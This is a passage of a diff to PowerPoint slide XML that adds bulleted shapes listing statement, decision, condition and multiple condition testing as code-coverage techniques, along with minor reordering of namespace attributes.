+          <a:lnRef idx="1">
+            <a:schemeClr val="accent6"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent6"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent6"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="Прямоугольник 8"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1224136" y="2492896"/>
+            <a:ext cx="6588224" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Statement testing</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="10" name="Flowchart: Connector 13"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="936104" y="2969424"/>
+            <a:ext cx="84841" cy="99536"/>
+          </a:xfrm>
+          <a:prstGeom prst="flowChartConnector">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent6"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent6"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent6"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="Прямоугольник 10"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1224136" y="2852936"/>
+            <a:ext cx="5652120" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Decision testing</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="16" name="Flowchart: Connector 13"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="936104" y="3329464"/>
+            <a:ext cx="84841" cy="99536"/>
+          </a:xfrm>
+          <a:prstGeom prst="flowChartConnector">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent6"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent6"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent6"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="17" name="Прямоугольник 16"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1224136" y="3212976"/>
+            <a:ext cx="5652120" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Condition testing</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="12" name="Flowchart: Connector 13"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="936104" y="3689504"/>
+            <a:ext cx="84841" cy="99536"/>
+          </a:xfrm>
+          <a:prstGeom prst="flowChartConnector">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent6"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent6"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent6"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="13" name="Прямоугольник 12"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1224136" y="3573016"/>
+            <a:ext cx="5652120" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Multiple condition testing</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="29" name="Rectangle 6"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="611560" y="4078813"/>
+            <a:ext cx="7416947" cy="646331"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>All these testing techniques help measure the code coverage: statement coverage, decision coverage, condition coverage etc. </a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4060775951"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="4060775951"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -11978,7 +12438,7 @@
     <a:masterClrMapping/>
   </p:clrMapOvr>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
-    <mc:Choice xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" Requires="p14">
+    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" Requires="p14">
       <p:transition spd="slow" p14:dur="2000"/>
     </mc:Choice>
     <mc:Fallback>
